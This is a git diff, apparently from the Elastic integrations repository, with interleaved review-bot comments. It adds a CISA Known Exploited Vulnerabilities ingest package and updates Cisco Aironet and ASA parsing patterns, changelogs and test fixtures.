"b2191ffc-7417-40bb-893a-732d7ce668b0:indexpattern-datasource-layer-a8d7a9de-d9d9-44f4-834e-4cdf07d9c32a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "35f41e97-ee29-4ae8-b1f8-da96071026c5:indexpattern-datasource-layer-6e62103f-8ff3-4d24-916f-7a9702eb9f31", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "aaae6248-e18f-4e38-ba33-65fd6339ceb5:indexpattern-datasource-layer-a3231286-d69b-47b3-9a8c-940078747bbb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b2398a92-2791-44d2-ab6e-62168742b786:indexpattern-datasource-layer-00d70036-f0e2-4855-bf07-cb4170c30898", + "type": "index-pattern" 
+ }, + { + "id": "logs-*", + "name": "16245c6e-c656-4464-8e41-2f2ef485c99d:indexpattern-datasource-layer-6e62103f-8ff3-4d24-916f-7a9702eb9f31", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/cisa_kevs/manifest.yml b/packages/cisa_kevs/manifest.yml new file mode 100644 index 00000000000..091fcdd819b --- /dev/null +++ b/packages/cisa_kevs/manifest.yml 
@@ -0,0 +1,40 @@
+format_version: 3.0.3
+name: cisa_kevs
+title: "CISA Known Exploited Vulnerabilities"
+version: 1.0.0
+description: "This a package that allows the ingest of known exploited vulnerabilities according to the Cybersecurity and Infrastructure Security Agency of the United States of America. This information could be used to enrich or track exisiting vulnerabilities that are known to be exploited in the wild."
+type: integration
+categories:
+ - security
+conditions:
+ kibana:
+ version: "^8.11.4"
+ elastic:
+ subscription: "basic"
+screenshots:
+ - src: /img/cisa_kevs.png
+ title: Dashboard for CISA Known Exploitable Vulnerabilities
+ size: 600x600
+ type: image/png
+icons:
+ - src: "/img/icon.svg"
+ type: "image/svg+xml"
+policy_templates:
+ - name: cisa_kevs
+ title: CISA Known Exploited Vulnerabilities
+ description: Ingest the CISA KEVs with Elastic Agent.
+ inputs:
+ - type: httpjson
+ title: "Collect CISA KEVs via API"
+ description: "Ingest the CISA KEVs with Elastic Agent."
+ vars:
+ - name: enable_request_tracer
+ type: bool
+ title: Enable request tracing
+ multi: false
+ required: false
+ show_user: false
+ description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details.
+owner:
+ github: elastic/security-service-integrations
+ type: community
diff --git a/packages/cisa_kevs/validation.yml b/packages/cisa_kevs/validation.yml
new file mode 100644
index 00000000000..1909b26667a
--- /dev/null
+++ b/packages/cisa_kevs/validation.yml
@@ -0,0 +1,3 @@
+errors:
+ exclude_checks:
+ - SVR00002 # expected filter in dashboard.
diff --git a/packages/cisco_aironet/changelog.yml b/packages/cisco_aironet/changelog.yml
index 5a25f6eedbd..e40ec0d9f9a 100644
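Review bot: The `description` string of the new manifest carries two typos that will be shown verbatim in the Integrations UI: `This a package that allows` should read `This is a package that allows`, and `exisiting` should be `existing`. The screenshot title `Dashboard for CISA Known Exploitable Vulnerabilities` also disagrees with the package title and the policy-template title, which both say "Exploited"; one wording should be used throughout. The owner block pairs `github: elastic/security-service-integrations` with `type: community`, which reads as a mismatch between an Elastic-maintained team and a community ownership type — worth confirming that `community` is intended. The httpjson input exposes only `enable_request_tracer` at this level; the feed URL and polling interval presumably live in the data stream manifest, which is not in view.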
--- a/packages/cisco_aironet/changelog.yml +++ b/packages/cisco_aironet/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.13.1" + changes: + - description: Fix CLIENT_ORCH_LOG messages. + type: bugfix + link: https://github.com/elastic/integrations/pull/9545 +- version: "1.13.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.12.2" changes: - description: Changed owners diff --git a/packages/cisco_aironet/data_stream/log/_dev/test/pipeline/test-aironet-messages.log b/packages/cisco_aironet/data_stream/log/_dev/test/pipeline/test-aironet-messages.log index 4634c016330..1dbfc5c1acd 100644 --- a/packages/cisco_aironet/data_stream/log/_dev/test/pipeline/test-aironet-messages.log +++ b/packages/cisco_aironet/data_stream/log/_dev/test/pipeline/test-aironet-messages.log @@ -28,4 +28,5 @@ <131>WLC001: *radiusTransportThread: Aug 29 10:58:58.000: %AAA-3-INVALID_REQUEST: [PA]radius_db.c:3923 Invalid AAA request. unknown <131>WLC001: *Dot1x_NW_MsgTask_3: Aug 29 10:58:57.787: %DOT1X-3-AAA_AUTH_SEND_FAIL: [PA]1x_aaa.c:893 Unable to send AAA message for client de:fb:48:7c:4f:f7 <132>WLC001: *bcastReceiveTask: Aug 20 14:55:28.577: %BCAST-4-MLD_INVALID_IPV6_PKT: bcastMld.c:2594 Received IPV6 packet which is not a valid MLD packet -<132>WLC001: *apfReceiveTask: Aug 22 10:24:20.959: %APF-4-MOBILESTATION_NOT_FOUND: apf_ms.c:8467 Could not find the mobile cc:73:14:61:b0:8f in internal database \ No newline at end of file +<132>WLC001: *apfReceiveTask: Aug 22 10:24:20.959: %APF-4-MOBILESTATION_NOT_FOUND: apf_ms.c:8467 Could not find the mobile cc:73:14:61:b0:8f in internal database +<190>201477: Jan 4 17:25:42.866: %CLIENT_ORCH_LOG-6-CLIENT_ADDED_TO_RUN_STATE: Chassis 2 R0/0: wncd: Username entry (00-00-00-00-00-00) joined with ssid (System-110) for device with MAC: 0000.0000.0000 \ No newline at end of file 
diff --git a/packages/cisco_aironet/data_stream/log/_dev/test/pipeline/test-aironet-messages.log-expected.json b/packages/cisco_aironet/data_stream/log/_dev/test/pipeline/test-aironet-messages.log-expected.json index 0f5d3298dee..52d0098d22a 100644 --- a/packages/cisco_aironet/data_stream/log/_dev/test/pipeline/test-aironet-messages.log-expected.json +++ b/packages/cisco_aironet/data_stream/log/_dev/test/pipeline/test-aironet-messages.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-09-06T23:08:09.371Z", + "@timestamp": "2024-09-06T23:08:09.371Z", "client": { "ip": "169.254.161.111", "mac": "2C-6D-C1-F5-0C-80" @@ -43,7 +43,7 @@ ] }, { - "@timestamp": "2023-09-06T22:42:10.514Z", + "@timestamp": "2024-09-06T22:42:10.514Z", "client": { "ip": "192.168.1.3", "mac": "66-7C-DE-EF-D9-18" @@ -111,7 +111,7 @@ ] }, { - "@timestamp": "2023-09-06T21:53:55.930Z", + "@timestamp": "2024-09-06T21:53:55.930Z", "client": { "mac": "28-6F-7F-F8-64-E0" }, @@ -151,7 +151,7 @@ } }, { - "@timestamp": "2023-09-06T21:46:20.390Z", + "@timestamp": "2024-09-06T21:46:20.390Z", "client": { "mac": "28-6F-7F-F8-64-E0" }, @@ -191,7 +191,7 @@ } }, { - "@timestamp": "2023-08-20T11:26:35.845Z", + "@timestamp": "2024-08-20T11:26:35.845Z", "cisco": { "interface": { "type": "wired" @@ -233,7 +233,7 @@ ] }, { - "@timestamp": "2023-08-20T11:25:50.157Z", + "@timestamp": "2024-08-20T11:25:50.157Z", "cisco": { "interface": { "type": "wired" @@ -275,7 +275,7 @@ ] }, { - "@timestamp": "2023-08-22T16:55:06.121Z", + "@timestamp": "2024-08-22T16:55:06.121Z", "cisco": { "interface": { "type": "wireless" @@ -318,7 +318,7 @@ ] }, { - "@timestamp": "2023-09-06T23:29:50.900Z", + "@timestamp": "2024-09-06T23:29:50.900Z", "client": { "mac": "E8-96-06-02-02-99" }, @@ -358,7 +358,7 @@ } }, { - "@timestamp": "2023-08-22T07:10:46.332Z", + "@timestamp": "2024-08-22T07:10:46.332Z", "cisco": { "interface": { "type": "wireless" 
@@ -400,7 +400,7 @@ ] }, { - "@timestamp": "2023-08-22T18:11:40.438Z", + "@timestamp": "2024-08-22T18:11:40.438Z", "client": { "as": { "number": 29518, @@ -458,7 +458,7 @@ } }, { - "@timestamp": "2023-08-22T18:14:03.172Z", + "@timestamp": "2024-08-22T18:14:03.172Z", "ecs": { "version": "8.11.0" }, @@ -499,7 +499,7 @@ ] }, { - "@timestamp": "2023-08-22T18:14:24.672Z", + "@timestamp": "2024-08-22T18:14:24.672Z", "cisco": { "wps": { "channel": 6, @@ -544,7 +544,7 @@ ] }, { - "@timestamp": "2023-08-22T18:14:24.672Z", + "@timestamp": "2024-08-22T18:14:24.672Z", "client": { "mac": "4A-B8-CB-63-1D-BD" }, @@ -582,7 +582,7 @@ ] }, { - "@timestamp": "2023-08-22T17:54:24.269Z", + "@timestamp": "2024-08-22T17:54:24.269Z", "destination": { "mac": "28-6F-7F-F8-64-E0" }, @@ -629,7 +629,7 @@ } }, { - "@timestamp": "2023-08-21T22:15:34.710Z", + "@timestamp": "2024-08-21T22:15:34.710Z", "client": { "mac": "80-7D-3A-9B-2F-FC" }, @@ -666,7 +666,7 @@ ] }, { - "@timestamp": "2023-08-21T20:12:58.040Z", + "@timestamp": "2024-08-21T20:12:58.040Z", "client": { "mac": "CC-73-14-61-B0-8F" }, @@ -703,7 +703,7 @@ ] }, { - "@timestamp": "2023-08-29T10:58:28.227Z", + "@timestamp": "2024-08-29T10:58:28.227Z", "ecs": { "version": "8.11.0" }, @@ -738,7 +738,7 @@ ] }, { - "@timestamp": "2023-08-29T10:46:48.939Z", + "@timestamp": "2024-08-29T10:46:48.939Z", "client": { "mac": "DE-FB-48-7C-4F-F7" }, @@ -776,7 +776,7 @@ ] }, { - "@timestamp": "2023-08-29T10:55:30.862Z", + "@timestamp": "2024-08-29T10:55:30.862Z", "cisco": { "eapol": { "descriptor": 2, @@ -820,7 +820,7 @@ ] }, { - "@timestamp": "2023-08-29T10:55:30.850Z", + "@timestamp": "2024-08-29T10:55:30.850Z", "client": { "mac": "DE-FB-48-7C-4F-F7" }, @@ -857,7 +857,7 @@ ] }, { - "@timestamp": "2023-08-29T10:55:38.289Z", + "@timestamp": "2024-08-29T10:55:38.289Z", "cisco": { "eapol": { "descriptor": 2, 
@@ -901,7 +901,7 @@ ] }, { - "@timestamp": "2023-08-29T10:58:54.242Z", + "@timestamp": "2024-08-29T10:58:54.242Z", "client": { "mac": "DE-FB-48-7C-4F-F7" }, @@ -938,7 +938,7 @@ ] }, { - "@timestamp": "2023-08-29T10:58:19.828Z", + "@timestamp": "2024-08-29T10:58:19.828Z", "client": { "mac": "DE-FB-48-7C-4F-F7" }, @@ -975,7 +975,7 @@ ] }, { - "@timestamp": "2023-08-29T10:47:25.944Z", + "@timestamp": "2024-08-29T10:47:25.944Z", "ecs": { "version": "8.11.0" }, @@ -1009,7 +1009,7 @@ ] }, { - "@timestamp": "2023-08-29T10:52:56.103Z", + "@timestamp": "2024-08-29T10:52:56.103Z", "client": { "mac": "DE-FB-48-7C-4F-F7" }, @@ -1046,7 +1046,7 @@ ] }, { - "@timestamp": "2023-08-22T18:14:24.651Z", + "@timestamp": "2024-08-22T18:14:24.651Z", "ecs": { "version": "8.11.0" }, @@ -1077,7 +1077,7 @@ ] }, { - "@timestamp": "2023-08-29T10:58:58.000Z", + "@timestamp": "2024-08-29T10:58:58.000Z", "ecs": { "version": "8.11.0" }, @@ -1111,7 +1111,7 @@ ] }, { - "@timestamp": "2023-08-29T10:58:57.787Z", + "@timestamp": "2024-08-29T10:58:57.787Z", "client": { "mac": "DE-FB-48-7C-4F-F7" }, @@ -1148,7 +1148,7 @@ ] }, { - "@timestamp": "2023-08-20T14:55:28.577Z", + "@timestamp": "2024-08-20T14:55:28.577Z", "ecs": { "version": "8.11.0" }, @@ -1182,7 +1182,7 @@ ] }, { - "@timestamp": "2023-08-22T10:24:20.959Z", + "@timestamp": "2024-08-22T10:24:20.959Z", "ecs": { "version": "8.11.0" }, 
@@ -1214,6 +1214,34 @@ "tags": [ "preserve_original_event" ] + }, + { + "@timestamp": "2024-01-04T17:25:42.866Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "CLIENT_ADDED_TO_RUN_STATE", + "original": "<190>201477: Jan 4 17:25:42.866: %CLIENT_ORCH_LOG-6-CLIENT_ADDED_TO_RUN_STATE: Chassis 2 R0/0: wncd: Username entry (00-00-00-00-00-00) joined with ssid (System-110) for device with MAC: 0000.0000.0000", + "provider": "CLIENT_ORCH_LOG", + "severity": "6" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 23 + }, + "priority": 190, + "severity": { + "code": 6 + } + } + }, + "message": "Chassis 2 R0/0: wncd: Username entry (00-00-00-00-00-00) joined with ssid (System-110) for device with MAC: 0000.0000.0000", + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_aironet/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_aironet/data_stream/log/elasticsearch/ingest_pipeline/default.yml index b9a65d80a18..c8228d286bd 100644 --- a/packages/cisco_aironet/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_aironet/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -15,6 +15,7 @@ processors: patterns: - "%{SYSLOG_HEADER}:\\s%%{GREEDYDATA:_temp_.full_message}" - "%{SYSLOGFACILITY}%{INT}: AP:%{MAC:host.mac}: \\*%{AIRONET_DATE:_temp_.raw_date}: %%{GREEDYDATA:_temp_.full_message}" + - "%{SYSLOGFACILITY}%{INT}: %{AIRONET_DATE:_temp_.raw_date}: %%{GREEDYDATA:_temp_.full_message}" - "%{SYSLOGFACILITY}%{DATA:host.name}: -%{GREEDYDATA:_temp_.full_message}" pattern_definitions: SYSLOG_HEADER: "%{SYSLOGFACILITY}%{DATA:host.name}:\\s\\*%{DATA:process.name}:\\s%{AIRONET_DATE:_temp_.raw_date}" 
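Review bot: Every `@timestamp` in this fixture (the hunks from L818 through this one) moved from 2023 to 2024 even though the input lines carry no year, which suggests the pipeline's date handling fills in the current year at test time, so this expected output will drift again at the next year boundary; the cisco_asa fixture that follows shows the same shift in its `@timestamp`, `start` and `end` values. If the year cannot be made explicit in the test input, a comment in the test config noting that the fixture is regenerated each January would at least make the annual churn expected rather than a surprise. Separately, the new expected document for `CLIENT_ORCH_LOG` keeps `Chassis 2 R0/0: wncd:` inside `message` and has no `host.name` or `process.name`, so this message family is not attributable to a controller or daemon from the syslog line itself (the shipper's host fields may still cover the host).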
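Review bot: The new syslog pattern drops the leading message counter (the bare `%{INT}` after `%{SYSLOGFACILITY}`) and captures neither `host.name` nor `process.name`, so for lines like the `<190>201477: Jan 4 ...` fixture the counter is lost and sequence gaps cannot be spotted afterwards. Keeping it is a one-token change: `- "%{SYSLOGFACILITY}%{INT:event.sequence:long}: %{AIRONET_DATE:_temp_.raw_date}: %%{GREEDYDATA:_temp_.full_message}"`, which lands the value in the ECS `event.sequence` field. The second grok stage is where the `wncd` daemon name could be lifted into `process.name`, since this first stage only isolates the header. The `processors` list and the grok processor this pattern belongs to start above the hunk.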
@@ -36,6 +37,7 @@ processors: ignore_failure: true patterns: - "%{DATA:event.provider}-%{INT:event.severity}-%{DATA:event.action}: %{DATA}:%{INT} %{GREEDYDATA:message}" + - "%{DATA:event.provider}-%{INT:event.severity}-%{DATA:event.action}: %{GREEDYDATA:message}" - grok: field: _temp_.full_message ignore_failure: true diff --git a/packages/cisco_aironet/manifest.yml b/packages/cisco_aironet/manifest.yml index f86769517a3..84a186309e1 100644 --- a/packages/cisco_aironet/manifest.yml +++ b/packages/cisco_aironet/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: cisco_aironet title: "Cisco Aironet" -version: "1.12.2" +version: "1.13.1" description: "Integration for Cisco Aironet WLC Logs" type: integration categories: diff --git a/packages/cisco_asa/changelog.yml b/packages/cisco_asa/changelog.yml index 209d471e526..485d995ab5d 100644 --- a/packages/cisco_asa/changelog.yml +++ b/packages/cisco_asa/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "2.33.0" + changes: + - description: Improve methods for applying ECS categorizations. + type: enhancement + link: https://github.com/elastic/integrations/pull/9548 +- version: "2.32.1" + changes: + - description: Fix ingest pipeline regex warnings + type: bugfix + link: https://github.com/elastic/integrations/issues/9489 +- version: "2.32.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 +- version: "2.31.0" + changes: + - description: Add message ids 722022, 722023. + type: enhancement + link: https://github.com/elastic/integrations/pull/9222 - version: "2.30.1" changes: - description: Changed owners diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json index 2e4fea5b89f..446adbb02ba 100644 
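Review bot: The fallback pattern added here leaves the whole `Chassis 2 R0/0: wncd: ` prefix inside `message`, so `process.name` (`wncd`) and the chassis/slot are not searchable as fields for this message family, whereas the existing pattern above at least strips the `file.c:line` prefix from the older format. A dedicated pattern tried before the catch-all would capture them, e.g. `- "%{DATA:event.provider}-%{INT:event.severity}-%{DATA:event.action}: Chassis %{INT:cisco.aironet.chassis:int} R%{DATA:cisco.aironet.slot}: %{DATA:process.name}: %{GREEDYDATA:message}"` (the two `cisco.aironet.*` names are constructed here and would need matching `fields.yml` entries; capturing only `process.name` and leaving the rest in `message` is the smaller option). The catch-all should then stay last so the older `%{DATA}:%{INT}` form keeps matching first. The grok processor this list belongs to starts above the hunk.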
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "connection_id": "111111111", @@ -89,7 +89,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "connection_id": "111111111", @@ -177,7 +177,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "icmp_code": 3, @@ -245,7 +245,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "source_interface": "net" @@ -261,11 +261,11 @@ ], "code": "609002", "duration": 0, - "end": "2023-05-05T17:51:17.000Z", + "end": "2024-05-05T17:51:17.000Z", "kind": "event", "original": "May 5 17:51:17 dev01: %FTD-7-609002: Teardown local-host net:192.168.2.2 duration 0:00:00", "severity": 7, - "start": "2023-05-05T17:51:17.000Z", + "start": "2024-05-05T17:51:17.000Z", "timezone": "UTC", "type": [ "connection", @@ -306,7 +306,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "source_interface": "net" @@ -364,7 +364,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "icmp_code": 1, @@ -432,7 +432,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "connection_id": "111111111", @@ -519,7 +519,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "connection_id": "941243214", 
@@ -599,7 +599,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "destination_interface": "fw111" @@ -670,7 +670,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "destination_interface": "fw111", @@ -751,7 +751,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "ecs": { "version": "8.11.0" }, @@ -791,7 +791,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "destination_interface": "dstif", @@ -871,7 +871,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "destination_interface": "dstif", @@ -962,7 +962,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "destination_interface": "dstif", @@ -1050,7 +1050,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "destination_interface": "dstif", @@ -1130,7 +1130,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "destination_interface": "dstif", @@ -1215,7 +1215,7 @@ ] }, { - "@timestamp": "2023-05-05T18:16:21.000Z", + "@timestamp": "2024-05-05T18:16:21.000Z", "cisco": { "asa": { "icmp_code": 0, @@ -1284,7 +1284,7 @@ ] }, { - "@timestamp": "2023-05-05T18:22:35.000Z", + "@timestamp": "2024-05-05T18:22:35.000Z", "cisco": { "asa": { "source_interface": "net" @@ -1342,7 +1342,7 @@ ] }, { - "@timestamp": "2023-05-05T18:24:31.000Z", + "@timestamp": "2024-05-05T18:24:31.000Z", "cisco": { "asa": { "source_interface": "identity" 
@@ -1358,11 +1358,11 @@ ], "code": "609002", "duration": 0, - "end": "2023-05-05T18:24:31.000Z", + "end": "2024-05-05T18:24:31.000Z", "kind": "event", "original": "May 5 18:24:31 dev01: %ASA-7-609002: Teardown local-host identity:10.10.10.10 duration 0:00:00", "severity": 7, - "start": "2023-05-05T18:24:31.000Z", + "start": "2024-05-05T18:24:31.000Z", "timezone": "UTC", "type": [ "connection", @@ -1403,7 +1403,7 @@ ] }, { - "@timestamp": "2023-05-05T18:29:32.000Z", + "@timestamp": "2024-05-05T18:29:32.000Z", "cisco": { "asa": { "mapped_source_ip": "81.2.69.144" @@ -1469,7 +1469,7 @@ ] }, { - "@timestamp": "2023-05-05T18:29:32.000Z", + "@timestamp": "2024-05-05T18:29:32.000Z", "cisco": { "asa": { "icmp_code": 3, @@ -1537,7 +1537,7 @@ ] }, { - "@timestamp": "2023-05-05T18:29:32.000Z", + "@timestamp": "2024-05-05T18:29:32.000Z", "cisco": { "asa": { "connection_id": "2960892904", @@ -1560,12 +1560,12 @@ ], "code": "302014", "duration": 0, - "end": "2023-05-05T18:29:32.000Z", + "end": "2024-05-05T18:29:32.000Z", "kind": "event", "original": "May 5 18:29:32 dev01: %ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I", "reason": "TCP Reset-I", "severity": 6, - "start": "2023-05-05T18:29:32.000Z", + "start": "2024-05-05T18:29:32.000Z", "timezone": "UTC", "type": [ "connection", @@ -1619,7 +1619,7 @@ ] }, { - "@timestamp": "2023-05-05T18:29:32.000Z", + "@timestamp": "2024-05-05T18:29:32.000Z", "cisco": { "asa": { "connection_id": "1588662", @@ -1707,7 +1707,7 @@ ] }, { - "@timestamp": "2023-05-05T18:29:32.000Z", + "@timestamp": "2024-05-05T18:29:32.000Z", "cisco": { "asa": { "destination_interface": "out111", 
@@ -1729,11 +1729,11 @@ ], "code": "305012", "duration": 0, - "end": "2023-05-05T18:29:32.000Z", + "end": "2024-05-05T18:29:32.000Z", "kind": "event", "original": "May 5 18:29:32 dev01: %ASA-6-305012: Teardown dynamic UDP translation from fw111:10.10.10.10/54230 to out111:192.168.2.2/54230 duration 0:00:00", "severity": 6, - "start": "2023-05-05T18:29:32.000Z", + "start": "2024-05-05T18:29:32.000Z", "timezone": "UTC", "type": [ "connection", @@ -1786,7 +1786,7 @@ ] }, { - "@timestamp": "2023-05-05T18:40:50.000Z", + "@timestamp": "2024-05-05T18:40:50.000Z", "cisco": { "asa": { "icmp_type": 0, @@ -1856,7 +1856,7 @@ ] }, { - "@timestamp": "2023-05-05T18:40:50.000Z", + "@timestamp": "2024-05-05T18:40:50.000Z", "cisco": { "asa": { "destination_interface": "out111", @@ -1931,7 +1931,7 @@ ] }, { - "@timestamp": "2023-05-05T18:40:50.000Z", + "@timestamp": "2024-05-05T18:40:50.000Z", "cisco": { "asa": { "source_interface": "out111" @@ -2003,7 +2003,7 @@ ] }, { - "@timestamp": "2023-05-05T18:40:50.000Z", + "@timestamp": "2024-05-05T18:40:50.000Z", "cisco": { "asa": { "connection_id": "1671727", @@ -2026,11 +2026,11 @@ ], "code": "302016", "duration": 124000000000, - "end": "2023-05-05T18:40:50.000Z", + "end": "2024-05-05T18:40:50.000Z", "kind": "event", "original": "May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:1192.168.2.2/53356 duration 0:02:04 bytes 64585", "severity": 2, - "start": "2023-05-05T18:38:46.000Z", + "start": "2024-05-05T18:38:46.000Z", "timezone": "UTC", "type": [ "connection", @@ -2083,7 +2083,7 @@ ] }, { - "@timestamp": "2023-05-05T18:40:50.000Z", + "@timestamp": "2024-05-05T18:40:50.000Z", "cisco": { "asa": { "connection_id": "1743372", @@ -2171,7 +2171,7 @@ ] }, { - "@timestamp": "2023-05-05T18:40:50.000Z", + "@timestamp": "2024-05-05T18:40:50.000Z", "cisco": { "asa": { "connection_id": "1743372", 
@@ -2259,7 +2259,7 @@ ] }, { - "@timestamp": "2023-05-05T18:40:50.000Z", + "@timestamp": "2024-05-05T18:40:50.000Z", "cisco": { "asa": { "destination_interface": "out111", @@ -2337,7 +2337,7 @@ ] }, { - "@timestamp": "2023-05-05T18:40:50.000Z", + "@timestamp": "2024-05-05T18:40:50.000Z", "cisco": { "asa": { "source_interface": "fw111" @@ -2405,7 +2405,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "source_interface": "fw111" @@ -2477,7 +2477,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "source_interface": "out111" @@ -2548,7 +2548,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "source_interface": "out111" @@ -2619,7 +2619,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "source_interface": "fw111" @@ -2690,7 +2690,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "destination_interface": "net", @@ -2765,7 +2765,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "destination_interface": "net", @@ -2840,7 +2840,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "destination_interface": "net", @@ -2914,7 +2914,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "destination_interface": "net", 
@@ -2936,12 +2936,12 @@ ], "code": "302023", "duration": 0, - "end": "2023-05-05T19:02:58.000Z", + "end": "2024-05-05T19:02:58.000Z", "kind": "event", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for fw111:10.10.10.10/39210 to net:192.168.2.2/10051 duration 0:00:00 forwarded bytes 0 Cluster flow with CLU closed on owner", "reason": "Cluster flow with CLU closed on owner", "severity": 6, - "start": "2023-05-05T19:02:58.000Z", + "start": "2024-05-05T19:02:58.000Z", "timezone": "UTC", "type": [ "info" @@ -2994,7 +2994,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "destination_interface": "unknown", @@ -3016,12 +3016,12 @@ ], "code": "302023", "duration": 0, - "end": "2023-05-05T19:02:58.000Z", + "end": "2024-05-05T19:02:58.000Z", "kind": "event", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for net:10.10.10.10/10051 to unknown:192.168.2.2/39222 duration 0:00:00 forwarded bytes 0 Forwarding or redirect flow removed to create director or backup flow", "reason": "Forwarding or redirect flow removed to create director or backup flow", "severity": 6, - "start": "2023-05-05T19:02:58.000Z", + "start": "2024-05-05T19:02:58.000Z", "timezone": "UTC", "type": [ "info" @@ -3074,7 +3074,7 @@ ] }, { - "@timestamp": "2023-05-05T19:03:27.000Z", + "@timestamp": "2024-05-05T19:03:27.000Z", "cisco": { "asa": { "command_line_arguments": "show access-list fw211111_access_out brief" @@ -3127,7 +3127,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "cisco": { "asa": { "command_line_arguments": "show access-list aaa_out brief" @@ -3180,7 +3180,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "cisco": { "asa": { "destination_interface": "fw111", 
